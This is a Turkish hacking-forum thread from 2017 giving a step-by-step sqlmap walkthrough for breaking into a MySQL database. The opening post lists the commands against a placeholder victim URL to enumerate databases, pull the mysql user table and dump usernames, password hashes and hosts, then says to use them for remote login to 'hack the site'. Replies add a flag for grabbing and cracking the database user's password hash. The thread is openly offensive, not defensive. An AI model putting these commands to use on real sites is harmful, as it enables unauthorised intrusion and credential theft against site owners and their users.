THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Sqlmap ile Mysql Veritabanı Hack

ScHell - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2017
Mesajlar:
58
Konular:
19
Teşekkür (Etti):
6
Teşekkür (Aldı):
11
Ticaret:
(0) %
01-10-2017 15:39
#1
Sqlmap ile Mysql Veritabanı Hack


Merhaba, hemen konuya geçelim.
Sqlmap dizinine gelin ve sırasıyla gösterdiğim komutları uygulayın;

sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent --dbs


Komutumuzu vererek sitemizin veritabanı bilgilerini öğreneceğiz. Bize burda lazım olacak olan mysql veritabanıdır.
Hemen mysql veritabanındaki tabloları çekiyoruz;

sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql --tables


ve ardından User tablomuzdaki kolonları çekiyoruz;



sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user --columns


Kolonlar geldikten sonra bize gerekli olanları yani User, Password ve Host kolonlarındaki bilgileri çekiyoruz.

sqlmap.py -u "http://www.kurban.com/vuln.php?id=5" --threads=10 --random-agent -D mysql -T user -C User,Password,Host --dump

ve bilgiler elimizde, bu bilgiler ile linux da remote mysql bağlantısı yaparak siteyi hackleyebilirsiniz.
Konu ScHell tarafından (25-10-2017 16:23 Saat 16:23 ) değiştirilmiştir.
forcest, Doguaslanturk Teşekkür etti.
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
21
Mesajlar:
652
Konular:
45
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Ticaret:
(0) %
01-10-2017 15:40
#2
yararlı
---------------------
NE MUTLU TÜRK'ÜM DİYENE

Security96 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
DARKWEB
Yaş:
20
Mesajlar:
2.817
Konular:
159
Teşekkür (Etti):
265
Teşekkür (Aldı):
294
Ticaret:
(0) %
01-10-2017 15:41
#3
Yararli
---------------------
Kapkaranlık Günler Geri de Kaldı Artık Aydınlıktayım Huzurlu ve dinginim

SaysaMaim
Amoteph - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
Golgota
Mesajlar:
190
Konular:
31
Teşekkür (Etti):
78
Teşekkür (Aldı):
16
Ticaret:
(0) %
02-10-2017 16:38
#4
tebrikler
MxRohst - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2017
Mesajlar:
456
Konular:
0
Teşekkür (Etti):
4
Teşekkür (Aldı):
61
Ticaret:
(0) %
02-10-2017 16:38
#5
Yaralı olmus
Hipster - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
03/2017
Nereden:
roo@parrot
Mesajlar:
300
Konular:
46
Teşekkür (Etti):
19
Teşekkür (Aldı):
30
Ticaret:
(0) %
02-10-2017 23:40
#6
işe yarar bir konu ama merak ettiğim birşey var bu şekilde büyük sitelerin veri tabanına girebilirmisin?
ScHell - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2017
Mesajlar:
58
Konular:
19
Teşekkür (Etti):
6
Teşekkür (Aldı):
11
Ticaret:
(0) %
02-10-2017 23:41
#7
Alıntı:
AlpShady´isimli üyeden Alıntı Mesajı göster
işe yarar bir konu ama merak ettiğim birşey var bu şekilde büyük sitelerin veri tabanına girebilirmisin?
Bir şekilde sql injection açığı bulup güvenlikleri bypass edebilirsen olur.
SLaYeR5S - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Nereden:
Nereye
Yaş:
21
Mesajlar:
966
Konular:
62
Teşekkür (Etti):
24
Teşekkür (Aldı):
465
Ticaret:
(0) %
02-10-2017 23:42
#8
elinize sağlık ustam
--------------------- C++=%70
Sql=%90
Phyton=%85
PHP=%75
C#=%65
Sosyal Mühendislik=%90



BİR ÖLÜR BİN DİRİLİRİZ !
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.185
Konular:
89
Teşekkür (Etti):
623
Teşekkür (Aldı):
497
Ticaret:
(0) %
02-10-2017 23:44
#9
Elinize sağlık. Aynı zamanda, --current-user --password komutu ile de veritabanı kullanıcısının hashli parolasi elde edilip crack yapılabilir.
---------------------
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK
27AsLaNBeY27 - ait Kullanıcı Resmi (Avatar)
Hür general
Üyelik tarihi:
04/2009
Nereden:
Su
Mesajlar:
1.048
Konular:
103
Teşekkür (Etti):
115
Teşekkür (Aldı):
111
Ticaret:
(0) %
03-10-2017 00:53
#10
Eline sağlık
---------------------
HATALIYSAM VARDIR BI BILDIĞIM

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler